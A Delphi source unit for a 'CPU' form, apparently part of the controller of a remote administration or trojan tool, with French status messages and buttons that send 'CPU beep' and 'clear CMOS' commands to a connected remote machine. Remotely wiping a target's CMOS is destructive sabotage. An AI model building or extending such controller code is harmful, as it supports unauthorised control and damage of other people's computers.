(***********************************************************************
************************************************************************
****                                                                ****
****                                                                ****
****     File Name: untCPU.pas                                      ****
****                                                                ****
****     Author: //hIDRA_5                                          ****
****                                                                ****
****     Description: Unit main of CPU form                         ****
****                                                                ****
****                                                                ****
************************************************************************
************************************************************************)

unit untCPU;

interface

uses
  Forms, Windows, SysUtils, Classes, Controls, StdCtrls, Buttons;

type
  TfrmCPU = class(TForm)
    GruCMOS: TGroupBox;
    SpdReset: TSpeedButton;
    GruBeep: TGroupBox;
    SpeedButton1: TSpeedButton;
    SpeedButton2: TSpeedButton;
    procedure FormCreate(Sender: TObject);
    procedure SpeedButton1Click(Sender: TObject);
    procedure SpdResetClick(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  frmCPU: TfrmCPU;

implementation

uses untCommands, untMain;

{$R *.DFM}

procedure TfrmCPU.FormCreate(Sender: TObject);
begin
   Caption:='CPU';
end;

procedure TfrmCPU.SpeedButton1Click(Sender: TObject);
const
   Status: array [0..1] of string = ('dsactiver', 'activer');
var
   i:Integer;
begin
   i:=(Sender as TSpeedButton).Tag;
   frmMain.strStatus:='Tentative de ' + Status[i] + ' CPU beep...';
   frmMain.SendCommand(COMMAND_CPU_BEEP,IntToStr(i));
end;

procedure TfrmCPU.SpdResetClick(Sender: TObject);
begin
   if not frmMain.ClientMain.Active then
   begin
      frmMain.PutStatus('pas connect...');
      Exit;
   end;
   if MessageBox(Handle,'effac le CMOS. Etes vous sure?',
      @frmMain.Caption[1],MB_ICONQUESTION or MB_YESNO) = ID_YES then
   begin
      frmMain.strStatus:='Tentative d''effacer le CMOS...';
      frmMain.SendCommand(COMMAND_CLEAR_CMOS,'');
   end;
end;

end.
